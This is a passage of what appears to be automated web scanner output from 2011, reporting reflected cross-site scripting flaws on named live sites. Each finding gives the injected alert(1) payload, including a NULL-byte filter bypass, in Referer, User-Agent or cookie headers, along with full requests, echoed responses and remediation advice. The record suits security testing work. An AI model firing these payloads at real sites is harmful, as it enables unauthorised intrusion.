Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=aeb3b"%3balert(1)//3f4b39407ec
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:09 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:09 GMT
Connection: close
Content-Length: 31063
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "aeb3b";alert(1)//3f4b39407ec"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2399d'%3balert(1)//1fd21ed3d2 was submitted in the Referer HTTP header. This input was echoed as 2399d';alert(1)//1fd21ed3d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-the-meaning-of-aba-on-my-payroll-direct-deposit-enrollment-form.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=2399d'%3balert(1)//1fd21ed3d2
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:09 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:09 GMT
Connection: close
Content-Length: 31061
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95b18'%3balert(1)//6e16c45e18f was submitted in the Referer HTTP header. This input was echoed as 95b18';alert(1)//6e16c45e18f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /questions/ask HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=95b18'%3balert(1)//6e16c45e18f
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Thu, 03 Feb 2011 16:35:53 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=cijh1055dy4tss55r0fkks45; path=/; HttpOnly
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=cijh1055dy4tss55r0fkks45; path=/; HttpOnly
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:53 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:35:53 GMT
Connection: close
Content-Length: 11928
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93a1d'%3balert(1)//1261bf759ea was submitted in the Referer HTTP header. This input was echoed as 93a1d';alert(1)//1261bf759ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /questions/filter/bank HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=93a1d'%3balert(1)//1261bf759ea
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:55 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:35:54 GMT
Connection: close
Content-Length: 49014
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60377</script><script>alert(1)</script>5e2b578442b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:14:04 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20813
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=60377</script><script>alert(1)</script>5e2b578442b"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3575c"-alert(1)-"7068f2207e8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif HTTP/1.1
Host: www.supermedia.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=3575c"-alert(1)-"7068f2207e8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; mbox=check#true#1296759589|session#1296759528614-838261#1296761389
Response (redirected)
HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:13:57 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20791
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=3575c"-alert(1)-"7068f2207e8"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00ba07d"-alert(1)-"85da7928a00 was submitted in the Referer HTTP header. This input was echoed as ba07d"-alert(1)-"85da7928a00 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:13:59 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 24677
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="%00ba07d"-alert(1)-"85da7928a00"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af436"-alert(1)-"c8d45d1ae80 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10af436"-alert(1)-"c8d45d1ae80
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750668049-www.superpages.com-11243779-100942; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:31:08 GMT; Path=/
Set-Cookie: JSESSIONID=70291ECCDC9094D55B86156B11544BBB; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:07 GMT
Content-Length: 65808
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Ally Bank in Philad ...[SNIP]...
var remote_add = "REMOTE_ADDR=173.193.214.243"; var http_user = "HTTP_USER_AGENT=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10af436"-alert(1)-"c8d45d1ae80"; var datServ = 'http://ugc-int.superpages.com'; var imgLoc = "http://img.superpages.com/images-yp/sp/images/ugc/"; var imServ = 'http://media.superpages.com/media/photos/'; var lidforpageload = '2118 ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae894"-alert(1)-"9ef9bbddbcc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1/2/3?command=makeThisMyHome&hp_pref=r HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Referer: http://www.google.com/search?hl=en&q=ae894"-alert(1)-"9ef9bbddbcc
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:09:17 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:10:17 GMT
Vary: User-Agent,Cookie
Content-Length: 5930
Set-Cookie: USIB2G=0000uiCjKm5hpdCoVHLx-JRHofH:14k1jbteq; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
The value of the V cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59a51'-alert(1)-'a6f6442db was submitted in the V cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bh/sync/admeld?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=8&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754790274&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj59a51'-alert(1)-'a6f6442db; cwbh1=2709%3B03%2F02%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F05%2F2011%3BFOCI1
Response
HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
Set-Cookie: V=gFEcJzqCjXJj59a51'-alert(1)-'a6f6442db; Domain=.contextweb.com; Expires=Sun, 29-Jan-2012 18:54:52 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 214
Date: Thu, 03 Feb 2011 18:54:52 GMT
The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 591c4"-alert(1)-"65b65c1c305 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411591c4"-alert(1)-"65b65c1c305; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" Vary: Accept-Encoding X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=125 Expires: Thu, 03 Feb 2011 16:12:04 GMT Date: Thu, 03 Feb 2011 16:09:59 GMT Connection: close Content-Length: 2549
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat='';var zzC ...[SNIP]... );}
var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~010411591c4"-alert(1)-"65b65c1c305;z=" + Math.random(); var ainfo = "";
var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd ...[SNIP]...
The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc04b"-alert(1)-"93a36e51360 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~010411dc04b"-alert(1)-"93a36e51360;z=" + Math.random(); var ainfo = "";
var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd ...[SNIP]...
The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ba9d"-alert(1)-"5d6a06513d5 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fmr.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=&s=134&z=0.00999015336856246 HTTP/1.1 Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~0104119ba9d"-alert(1)-"5d6a06513d5; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" Vary: Accept-Encoding X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=122 Expires: Thu, 03 Feb 2011 16:12:04 GMT Date: Thu, 03 Feb 2011 16:10:02 GMT Connection: close Content-Length: 2537
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=134;var zzPat='';var zzC ...[SNIP]... );}
